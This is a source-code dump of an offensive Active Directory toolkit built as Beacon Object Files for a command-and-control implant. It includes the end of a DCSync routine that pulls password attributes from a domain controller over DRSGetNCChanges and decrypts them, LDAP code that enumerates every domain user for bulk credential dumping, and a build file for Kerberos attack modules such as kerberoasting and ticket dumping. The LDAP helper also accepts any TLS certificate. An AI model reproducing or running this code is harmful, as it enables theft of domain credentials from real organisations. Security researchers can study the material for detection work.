    // Prepare GetNCChanges request (V8)
    DRS_MSG_GETCHGREQ request;
    InitDRSRequest(&request, &dcContext->dcObjectGuid, targetDsname);

    if (request.V8.PrefixTableDest.pPrefixEntry) {
        for (DWORD i = 0; i < request.V8.PrefixTableDest.PrefixCount && i < 15; i++) {
            char oidHex[128] = {0};
            for (DWORD j = 0; j < request.V8.PrefixTableDest.pPrefixEntry[i].prefix.length && j < 16; j++) {
                char byte[8];
                MSVCRT$_snprintf(byte, sizeof(byte), "%02X ", request.V8.PrefixTableDest.pPrefixEntry[i].prefix.elements[j]);
                MSVCRT$strcat(oidHex, byte);
            }

        }
    }

    // Make the DRSGetNCChanges call
    DWORD outVersion = 0;
    DRS_MSG_GETCHGREPLY reply;
    MSVCRT$memset(&reply, 0, sizeof(reply));
    
    // Using V8 request (gets V1 or V6 reply)
    ULONG result = IDL_DRSGetNCChanges(
        drsHandle,
        8,
        &request,
        &outVersion,
        &reply
    );
    
    if (result != 0) {
        ERROR_PRINT( "[-] DRSGetNCChanges failed: 0x%x (%u)", result, result);
        goto cleanup;
    }
    
    // Process the reply based on version - access correct union member
    REPLENTINFLIST* objects = NULL;

    switch (outVersion) {
        case 1:
            objects = reply.V1.pObjects;
            break;
        case 6:
        case 7:
        case 9:
            objects = reply.V6.pObjects;  // V6 structure
            break;
        default:
            ERROR_PRINT( "[!] Unexpected reply version: %u", outVersion);
            goto cleanup;
    }
    
    if (objects) {
        ENTINF* entinf = &objects->Entinf;
        ATTRBLOCK* attrBlock = &entinf->AttrBlock;
        
        for (ULONG i = 0; i < attrBlock->attrCount; i++) {
            ATTR* attr = &attrBlock->pAttr[i];
            if (attr->attrTyp == ATT_UNICODE_PWD && attr->AttrVal.valCount > 0) {
                DWORD valLen = attr->AttrVal.pAVal[0].valLen;
                if (valLen == 36 || valLen == 40) {
                    break;
                }
            }
        }
    }

    // Process and decrypt credentials
    ProcessCredentials(objects, userInfo->samAccountName, userInfo->distinguishedName, dcHostname, sessionKey, sessionKeyLen, onlyNT);
    
    
cleanup:
    // Cleanup
    if (drsHandle) IDL_DRSUnbind(&drsHandle);
    if (rpcBinding) RPCRT4$RpcBindingFree(&rpcBinding);
    if (pPartialAttrSet) MSVCRT$free(pPartialAttrSet);
    
    // Cleanup session key
    if (sessionKey) {
        MSVCRT$free(sessionKey);
        sessionKey = NULL;
    }

    // Free all OID copies
    for (DWORD i = 0; i < oidCopyCount; i++) {
        if (oidCopies[i]) MSVCRT$free(oidCopies[i]);
    }
    
    if (prefixEntries) MSVCRT$free(prefixEntries);
    if (targetDsname) MSVCRT$free(targetDsname);
    FreeUserInfo(userInfo);
    FreeDCContext(dcContext);
    if (dcHostname) MSVCRT$free(dcHostname);
}

================================================
FILE: AD-BOF/DCSync-BOF/util/ldap_common.c
================================================
#include <windows.h>
#include "../_include/ldap_common.h"

// Import required MSVCRT functions
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* str1, const char* str2);
DECLSPEC_IMPORT int __cdecl MSVCRT$strncmp(const char* str1, const char* str2, size_t count);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char* str);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char* dest, const char* src);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcat(char* dest, const char* src);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strchr(const char *str, int c);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strstr(const char* str, const char* substr);
DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(char* buffer, size_t count, const char* format, ...);
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t size);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* ptr);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(void* dest, const void* src, size_t count);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* dest, int c, size_t count);

// Import kernel32 functions
DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
DECLSPEC_IMPORT int WINAPI KERNEL32$WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar);

#define CP_UTF8 65001
#define CP_ACP 0

// SSL certificate callback - accepts all certificates
BOOLEAN ServerCertCallback(PLDAP Connection, PCCERT_CONTEXT pServerCert) {
    return TRUE;
}

// Convert char* to wchar_t*
wchar_t* CharToWChar(const char* str) {
    if (!str) return NULL;
    
    int len = KERNEL32$MultiByteToWideChar(CP_UTF8, 0, str, -1, NULL, 0);
    if (len == 0) return NULL;
    
    wchar_t* wstr = (wchar_t*)MSVCRT$malloc(len * sizeof(wchar_t));
    if (!wstr) return NULL;
    
    KERNEL32$MultiByteToWideChar(CP_UTF8, 0, str, -1, wstr, len);
    return wstr;
}

// Simple helper that returns NULL if input doesn't have length
char* ValidateInput(char* input) {
    if (input == NULL)
        return NULL;
    
    // Return NULL for empty strings, otherwise return the input
    if (MSVCRT$strlen(input) == 0)
        return NULL;

    return input;
}

// Initialize LDAP connection with proper authentication
LDAP* InitializeLDAPConnection(const char* dcAddress, BOOL useLdaps, char** outDcHostname) {
    LDAP* pLdapConnection = NULL;
    ULONG result;
    int portNumber = useLdaps ? LDAP_SSL_PORT : LDAP_PORT;
    char* discoveredDC = NULL;
    char* targetDC = NULL;

    // If no DC address provided, auto-discover it
    if (!dcAddress || MSVCRT$strlen(dcAddress) == 0) {
        // Inline GetDCHostName logic
        PDOMAIN_CONTROLLER_INFOA pdcInfo = NULL;
        DWORD dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo);
        
        if (dwRet == 0 && pdcInfo) {
            char* dcName = pdcInfo->DomainControllerName;
            if (dcName && dcName[0] == '\\' && dcName[1] == '\\') {
                dcName += 2;
            }
            if (dcName) {
                size_t len = MSVCRT$strlen(dcName) + 1;
                discoveredDC = (char*)MSVCRT$malloc(len);
                if (discoveredDC) {
                    MSVCRT$strcpy(discoveredDC, dcName);
                }
            }
            NETAPI32$NetApiBufferFree(pdcInfo);
        }
        
        if (!discoveredDC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to discover DC");
            return NULL;
        }
        targetDC = discoveredDC;
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Discovered DC: %s", targetDC);
    } else {
        targetDC = (char*)dcAddress;
    }

    // Store hostname for later use
    if (outDcHostname) {
        size_t len = MSVCRT$strlen(targetDC) + 1;
        *outDcHostname = (char*)MSVCRT$malloc(len);
        if (*outDcHostname) {
            MSVCRT$strcpy(*outDcHostname, targetDC);
        }
    }

    // Use ldap_init with hostname (ANSI version)
    pLdapConnection = WLDAP32$ldap_init(targetDC, portNumber);
    if (!pLdapConnection) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection on port %d", portNumber);
        if (discoveredDC) MSVCRT$free(discoveredDC);
        return NULL;
    }

    // Set LDAP version to 3
    ULONG version = LDAP_VERSION3;
    result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_VERSION, (void*)&version);
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set LDAP version: %lu", result);
        WLDAP32$ldap_unbind_s(pLdapConnection);
        if (discoveredDC) MSVCRT$free(discoveredDC);
        return NULL;
    }

    if (useLdaps) {
        // For LDAPS (port 636), enable SSL
        result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_SSL, LDAP_OPT_ON);
        if (result != LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to enable SSL: %lu", result);
            WLDAP32$ldap_unbind_s(pLdapConnection);
            if (discoveredDC) MSVCRT$free(discoveredDC);
            return NULL;
        }

        // Set certificate callback
        result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_SERVER_CERTIFICATE, (void*)&ServerCertCallback);
        if (result != LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set certificate callback: %lu", result);
        }
    } else {
        // For regular LDAP (port 389), enable signing and sealing
        // These need to be set BEFORE binding with NEGOTIATE auth
        void* value = LDAP_OPT_ON;
        
        result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_SIGN, &value);
        if (result != LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Warning: Failed to enable LDAP signing: %lu", result);
        }

        result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_ENCRYPT, &value);
        if (result != LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Warning: Failed to enable LDAP encryption: %lu", result);
        }
    }

    // Bind using current credentials (NEGOTIATE)
    result = WLDAP32$ldap_bind_s(pLdapConnection, NULL, NULL, LDAP_AUTH_NEGOTIATE);
    
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to bind to LDAP (0x%x)", result);
        WLDAP32$ldap_unbind_s(pLdapConnection);
        if (discoveredDC) MSVCRT$free(discoveredDC);
        return NULL;
    }

    // Free discovered DC hostname if we allocated it
    if (discoveredDC) {
        MSVCRT$free(discoveredDC);
    }
    
    return pLdapConnection;
}

// Get DC context (defaultNamingContext and DC GUID)
// Returns allocated DC_CONTEXT structure, caller must free defaultNamingContext and struct
DC_CONTEXT* GetDCContext(LDAP* ld, const char* dcHostname) {
    if (!ld) return NULL;
    
    DC_CONTEXT* context = (DC_CONTEXT*)MSVCRT$malloc(sizeof(DC_CONTEXT));
    if (!context) return NULL;
    MSVCRT$memset(context, 0, sizeof(DC_CONTEXT));
    
    // Try to build defaultNamingContext from DC hostname first (faster, no network query)
    if (dcHostname && MSVCRT$strlen(dcHostname) > 0) {
        const char* domainStart = MSVCRT$strchr(dcHostname, '.');
        if (domainStart && *(domainStart + 1) != '\0') {
            domainStart++;
            
            int dotCount = 0;
            const char* p = domainStart;
            while (*p) {
                if (*p == '.') dotCount++;
                p++;
            }
            
            size_t domainLen = MSVCRT$strlen(domainStart);
            size_t bufferSize = domainLen + (dotCount + 1) * 3 + dotCount + 1;
            
            context->defaultNamingContext = (char*)MSVCRT$malloc(bufferSize);
            if (context->defaultNamingContext) {
                char* writePos = context->defaultNamingContext;
                const char* readPos = domainStart;
                BOOL firstComponent = TRUE;
                
                while (*readPos) {
                    if (!firstComponent) {
                        *writePos++ = ',';
                    }
                    firstComponent = FALSE;
                    
                    *writePos++ = 'D';
                    *writePos++ = 'C';
                    *writePos++ = '=';
                    
                    while (*readPos && *readPos != '.') {
                        *writePos++ = *readPos++;
                    }
                    
                    if (*readPos == '.') readPos++;
                }
                
                *writePos = '\0';
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Default naming context: %s", context->defaultNamingContext);
            }
        }
    }
    
    // Query rootDSE for both defaultNamingContext (if not built) and dsServiceName in one query
    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char* attrs[] = { "defaultNamingContext", "dsServiceName", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        "",
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query rootDSE");
        if (context->defaultNamingContext) MSVCRT$free(context->defaultNamingContext);
        MSVCRT$free(context);
        return NULL;
    }

    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        WLDAP32$ldap_msgfree(searchResult);
        if (context->defaultNamingContext) MSVCRT$free(context->defaultNamingContext);
        MSVCRT$free(context);
        return NULL;
    }

    // Get defaultNamingContext if we didn't build it from hostname
    if (!context->defaultNamingContext) {
        char** ncValues = WLDAP32$ldap_get_values(ld, entry, "defaultNamingContext");
        if (ncValues && ncValues[0]) {
            size_t len = MSVCRT$strlen(ncValues[0]) + 1;
            context->defaultNamingContext = (char*)MSVCRT$malloc(len);
            if (context->defaultNamingContext) {
                MSVCRT$strcpy(context->defaultNamingContext, ncValues[0]);
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Default naming context: %s", context->defaultNamingContext);
            }
            WLDAP32$ldap_value_free(ncValues);
        }
    }

    // Get dsServiceName and then query for its objectGUID
    char** dsValues = WLDAP32$ldap_get_values(ld, entry, "dsServiceName");
    if (dsValues && dsValues[0]) {
        char* dsServiceDN = dsValues[0];
        char* guidAttrs[] = { "objectGUID", NULL };
        LDAPMessage* guidResult = NULL;
        
        result = WLDAP32$ldap_search_s(
            ld,
            dsServiceDN,
            LDAP_SCOPE_BASE,
            "(objectClass=*)",
            guidAttrs,
            0,
            &guidResult
        );
        
        if (result == LDAP_SUCCESS) {
            LDAPMessage* guidEntry = WLDAP32$ldap_first_entry(ld, guidResult);
            if (guidEntry) {
                struct berval** guidValues = WLDAP32$ldap_get_values_len(ld, guidEntry, "objectGUID");
                if (guidValues && guidValues[0] && guidValues[0]->bv_len == sizeof(GUID)) {
                    MSVCRT$memcpy(&context->dcObjectGuid, guidValues[0]->bv_val, sizeof(GUID));
                    WLDAP32$ldap_value_free_len(guidValues);
                }
            }
            WLDAP32$ldap_msgfree(guidResult);
        }
        
        WLDAP32$ldap_value_free(dsValues);
    }

    WLDAP32$ldap_msgfree(searchResult);

    // Validate we got required fields
    if (!context->defaultNamingContext) {
        MSVCRT$free(context);
        return NULL;
    }

    return context;
}

// Free DC_CONTEXT structure
void FreeDCContext(DC_CONTEXT* context) {
    if (!context) return;
    if (context->defaultNamingContext) MSVCRT$free(context->defaultNamingContext);
    MSVCRT$free(context);
}

// Get all user info (DN, sAMAccountName, GUID) in a single LDAP query
// Returns allocated USER_LDAP_INFO structure, caller must free strings and struct
// Works with either sAMAccountName or DN as input
USER_LDAP_INFO* GetUserInfo(LDAP* ld, const char* identifier, const char* searchBase, BOOL isDN) {
    if (!ld || !identifier) return NULL;

    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char filter[512];
    char* attrs[] = { "distinguishedName", "sAMAccountName", "objectGUID", NULL };
    USER_LDAP_INFO* userInfo = NULL;
    
    // Build search filter and scope based on input type
    ULONG result;
    if (isDN) {
        // DN provided - use base scope query (fastest)
        result = WLDAP32$ldap_search_s(
            ld,
            (char*)identifier,
            LDAP_SCOPE_BASE,
            "(objectClass=*)",
            attrs,
            0,
            &searchResult
        );
    } else {
        // sAMAccountName provided - use subtree search
        MSVCRT$_snprintf(filter, sizeof(filter), "(sAMAccountName=%s)", identifier);
        result = WLDAP32$ldap_search_s(
            ld,
            (char*)searchBase,
            LDAP_SCOPE_SUBTREE,
            filter,
            attrs,
            0,
            &searchResult
        );
    }

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query user '%s'", identifier);
        return NULL;
    }

    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        BeaconPrintf(CALLBACK_ERROR, "[-] User '%s' not found", identifier);
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    // Allocate result structure
    userInfo = (USER_LDAP_INFO*)MSVCRT$malloc(sizeof(USER_LDAP_INFO));
    if (!userInfo) {
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }
    MSVCRT$memset(userInfo, 0, sizeof(USER_LDAP_INFO));

    // Get distinguishedName
    char** dnValues = WLDAP32$ldap_get_values(ld, entry, "distinguishedName");
    if (dnValues && dnValues[0]) {
        size_t len = MSVCRT$strlen(dnValues[0]) + 1;
        userInfo->distinguishedName = (char*)MSVCRT$malloc(len);
        if (userInfo->distinguishedName) {
            MSVCRT$strcpy(userInfo->distinguishedName, dnValues[0]);
        }
        WLDAP32$ldap_value_free(dnValues);
    }

    // Get sAMAccountName
    char** samValues = WLDAP32$ldap_get_values(ld, entry, "sAMAccountName");
    if (samValues && samValues[0]) {
        size_t len = MSVCRT$strlen(samValues[0]) + 1;
        userInfo->samAccountName = (char*)MSVCRT$malloc(len);
        if (userInfo->samAccountName) {
            MSVCRT$strcpy(userInfo->samAccountName, samValues[0]);
        }
        WLDAP32$ldap_value_free(samValues);
    }

    // Get objectGUID
    struct berval** guidValues = WLDAP32$ldap_get_values_len(ld, entry, "objectGUID");
    if (guidValues && guidValues[0] && guidValues[0]->bv_len == sizeof(GUID)) {
        MSVCRT$memcpy(&userInfo->objectGuid, guidValues[0]->bv_val, sizeof(GUID));
        WLDAP32$ldap_value_free_len(guidValues);
    }

    WLDAP32$ldap_msgfree(searchResult);

    // Validate we got required fields
    if (!userInfo->distinguishedName || !userInfo->samAccountName) {
        if (userInfo->distinguishedName) MSVCRT$free(userInfo->distinguishedName);
        if (userInfo->samAccountName) MSVCRT$free(userInfo->samAccountName);
        MSVCRT$free(userInfo);
        return NULL;
    }

    return userInfo;
}

// Free USER_LDAP_INFO structure
void FreeUserInfo(USER_LDAP_INFO* userInfo) {
    if (!userInfo) return;
    if (userInfo->distinguishedName) MSVCRT$free(userInfo->distinguishedName);
    if (userInfo->samAccountName) MSVCRT$free(userInfo->samAccountName);
    MSVCRT$free(userInfo);
}

// Cleanup LDAP connection
void CleanupLDAP(LDAP* ld) {
    if (ld) {
        WLDAP32$ldap_unbind_s(ld);
    }
}


================================================
FILE: AD-BOF/DCSync-BOF/util/ldap_syncall.c
================================================
// LDAP utilities for enumerating all users in DCSync-All BOF

#include <windows.h>
#include "../_include/ldap_common.h"

// Import required MSVCRT functions (if not already imported)
DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(char* buffer, size_t count, const char* format, ...);
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t size);
DECLSPEC_IMPORT void* __cdecl MSVCRT$realloc(void* ptr, size_t size);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* ptr);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(void* dest, const void* src, size_t count);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* dest, int c, size_t count);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char* str);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char* dest, const char* src);

// Structure to hold user information
typedef struct _USER_INFO {
    char* distinguishedName;
    char* samAccountName;
    GUID objectGuid;
} USER_INFO;

// Enumerate all user objects in the domain
// Returns array of USER_INFO structures and sets userCount
// Caller must free the array and strings within each structure
USER_INFO* EnumerateAllUsers(LDAP* ld, const char* searchBase, int* userCount, int onlyUsers) {
    if (!ld || !searchBase || !userCount) return NULL;
    
    *userCount = 0;
    
    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    // If onlyUsers=1, filter to SAM_USER_OBJECT (0x30000000) and SAM_TRUST_ACCOUNT (0x30000002) only
    char* filter = onlyUsers ? "(&(objectClass=user)(|(sAMAccountType=805306368)(sAMAccountType=805306370)))" : "(objectClass=user)";
    char* attrs[] = { "distinguishedName", "sAMAccountName", "objectGUID", NULL };
    
    // Search for all user objects
    ULONG result = WLDAP32$ldap_search_s(
        ld,
        (char*)searchBase,
        LDAP_SCOPE_SUBTREE,
        filter,
        attrs,
        0,
        &searchResult
    );
    
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to enumerate users: 0x%x", result);
        return NULL;
    }
    
    // Count entries
    int count = WLDAP32$ldap_count_entries(ld, searchResult);
    if (count <= 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] No users found in domain");
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }
    
    // Allocate array for user info
    USER_INFO* users = (USER_INFO*)MSVCRT$malloc(count * sizeof(USER_INFO));
    if (!users) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for user list");
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }
    MSVCRT$memset(users, 0, count * sizeof(USER_INFO));
    
    // Iterate through entries
    int index = 0;
    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    
    while (entry && index < count) {
        // Get distinguishedName
        char** dnValues = WLDAP32$ldap_get_values(ld, entry, "distinguishedName");
        if (dnValues && dnValues[0]) {
            size_t len = MSVCRT$strlen(dnValues[0]) + 1;
            users[index].distinguishedName = (char*)MSVCRT$malloc(len);
            if (users[index].distinguishedName) {
                MSVCRT$strcpy(users[index].distinguishedName, dnValues[0]);
            }
            WLDAP32$ldap_value_free(dnValues);
        }
        
        // Get sAMAccountName
        char** samValues = WLDAP32$ldap_get_values(ld, entry, "sAMAccountName");
        if (samValues && samValues[0]) {
            size_t len = MSVCRT$strlen(samValues[0]) + 1;
            users[index].samAccountName = (char*)MSVCRT$malloc(len);
            if (users[index].samAccountName) {
                MSVCRT$strcpy(users[index].samAccountName, samValues[0]);
            }
            WLDAP32$ldap_value_free(samValues);
        }
        
        // Get objectGUID
        struct berval** guidValues = WLDAP32$ldap_get_values_len(ld, entry, "objectGUID");
        if (guidValues && guidValues[0] && guidValues[0]->bv_len == sizeof(GUID)) {
            MSVCRT$memcpy(&users[index].objectGuid, guidValues[0]->bv_val, sizeof(GUID));
            WLDAP32$ldap_value_free_len(guidValues);
        }
        
        // Only count users that have all required fields
        if (users[index].distinguishedName && users[index].samAccountName) {
            index++;
        } else {
            // Free incomplete entry
            if (users[index].distinguishedName) MSVCRT$free(users[index].distinguishedName);
            if (users[index].samAccountName) MSVCRT$free(users[index].samAccountName);
            MSVCRT$memset(&users[index], 0, sizeof(USER_INFO));
        }
        
        entry = WLDAP32$ldap_next_entry(ld, entry);
    }
    
    WLDAP32$ldap_msgfree(searchResult);
    
    *userCount = index;
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully enumerated %d users", index);
    
    return users;
}

// Free user info array
void FreeUserInfoArray(USER_INFO* users, int userCount) {
    if (!users) return;
    
    for (int i = 0; i < userCount; i++) {
        if (users[i].distinguishedName) {
            MSVCRT$free(users[i].distinguishedName);
        }
        if (users[i].samAccountName) {
            MSVCRT$free(users[i].samAccountName);
        }
    }
    
    MSVCRT$free(users);
}


================================================
FILE: AD-BOF/DCSync-BOF/util/rpc-adapter.c
================================================
//
// RPC Stub Adapter for BOF Environment
//
// Provides the necessary functions for MIDL-generated RPC stubs
// to work within a Beacon Object File context.
//

#include <windows.h>

// Import MSVCRT functions for memory management
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t size);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* ptr);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* dest, int c, size_t count);

// MIDL_user_allocate - Required by RPC runtime
// Called by NDR marshalling code to allocate memory
void* __RPC_USER MIDL_user_allocate(size_t size) {
    return MSVCRT$malloc(size);
}

// MIDL_user_free - Required by RPC runtime
// Called by NDR marshalling code to free memory
void __RPC_USER MIDL_user_free(void* ptr) {
    if (ptr) {
        MSVCRT$free(ptr);
    }
}

================================================
FILE: AD-BOF/Kerbeus-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)

set(CMAKE_C_STANDARD 99)

# Include directories
include_directories(
    ${CMAKE_SOURCE_DIR}/_include
    ${CMAKE_CURRENT_SOURCE_DIR}/_include
    ${CMAKE_CURRENT_SOURCE_DIR}
)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -w -Wno-incompatible-pointer-types -DBOF")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Source files
set(HASH_SOURCES hash/hash.c)
set(KLIST_SOURCES klist/klist.c)
set(DESCRIBE_SOURCES describe/describe.c)
set(TGTDELEG_SOURCES tgtdeleg/tgtdeleg.c)
set(PTT_SOURCES ptt/ptt.c)
set(PURGE_SOURCES purge/purge.c)
set(ASKTGT_SOURCES asktgt/asktgt.c)
set(ASKTGS_SOURCES asktgs/asktgs.c)
set(RENEW_SOURCES renew/renew.c)
set(CHANGEPW_SOURCES changepw/changepw.c)
set(ASREPROASTING_SOURCES asreproasting/asreproasting.c)
set(KERBEROASTING_SOURCES kerberoasting/kerberoasting.c)
set(S4U_SOURCES s4u/s4u.c)
set(CROSS_S4U_SOURCES s4u/cross_s4u.c)

# Object file targets
add_library(kerb_hash OBJECT ${HASH_SOURCES})
add_library(kerb_klist OBJECT ${KLIST_SOURCES})
add_library(kerb_triage OBJECT ${KLIST_SOURCES})
target_compile_definitions(kerb_triage PRIVATE TRIAGE)
add_library(kerb_dump OBJECT ${KLIST_SOURCES})
target_compile_definitions(kerb_dump PRIVATE DUMP)
add_library(kerb_describe OBJECT ${DESCRIBE_SOURCES})
add_library(kerb_tgtdeleg OBJECT ${TGTDELEG_SOURCES})
add_library(kerb_ptt OBJECT ${PTT_SOURCES})
add_library(kerb_purge OBJECT ${PURGE_SOURCES})
add_library(kerb_asktgt OBJECT ${ASKTGT_SOURCES})
add_library(kerb_asktgs OBJECT ${ASKTGS_SOURCES})
add_library(kerb_renew OBJECT ${RENEW_SOURCES})
add_library(kerb_changepw OBJECT ${CHANGEPW_SOURCES})
add_library(kerb_asreproasting OBJECT ${ASREPROASTING_SOURCES})
add_library(kerb_kerberoasting OBJECT ${KERBEROASTING_SOURCES})
add_library(kerb_s4u OBJECT ${S4U_SOURCES})
add_library(kerb_cross_s4u OBJECT ${CROSS_S4U_SOURCES})

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF)

# Custom targets to copy object files to _bin
add_custom_target(copy_kerb_hash ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_hash> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/hash.x64.o
    DEPENDS kerb_hash
    COMMENT "Copying hash object file"
)

add_custom_target(copy_kerb_klist ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_klist> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/klist.x64.o
    DEPENDS kerb_klist
    COMMENT "Copying klist object file"
)

add_custom_target(copy_kerb_triage ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_triage> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/triage.x64.o
    DEPENDS kerb_triage
    COMMENT "Copying triage object file"
)

add_custom_target(copy_kerb_dump ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_dump> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/dump.x64.o
    DEPENDS kerb_dump
    COMMENT "Copying dump object file"
)

add_custom_target(copy_kerb_describe ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_describe> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/describe.x64.o
    DEPENDS kerb_describe
    COMMENT "Copying describe object file"
)

add_custom_target(copy_kerb_tgtdeleg ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_tgtdeleg> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/tgtdeleg.x64.o
    DEPENDS kerb_tgtdeleg
    COMMENT "Copying tgtdeleg object file"
)

add_custom_target(copy_kerb_ptt ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_ptt> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/ptt.x64.o
    DEPENDS kerb_ptt
    COMMENT "Copying ptt object file"
)

add_custom_target(copy_kerb_purge ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_purge> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/purge.x64.o
    DEPENDS kerb_purge
    COMMENT "Copying purge object file"
)

add_custom_target(copy_kerb_asktgt ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_asktgt> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/asktgt.x64.o
    DEPENDS kerb_asktgt
    COMMENT "Copying asktgt object file"
)

add_custom_target(copy_kerb_asktgs ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_asktgs> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/asktgs.x64.o
    DEPENDS kerb_asktgs
    COMMENT "Copying asktgs object file"
)

add_custom_target(copy_kerb_renew ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_renew> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/renew.x64.o
    DEPENDS kerb_renew
    COMMENT "Copying renew object file"
)

add_custom_target(copy_kerb_changepw ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_changepw> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/changepw.x64.o
    DEPENDS kerb_changepw
    COMMENT "Copying changepw object file"
)

add_custom_target(copy_kerb_asreproasting ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_asreproasting> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/asreproasting.x64.o
    DEPENDS kerb_asreproasting
    COMMENT "Copying asreproasting object file"
)

add_custom_target(copy_kerb_kerberoasting ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_kerberoasting> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/kerberoasting.x64.o
    DEPENDS kerb_kerberoasting
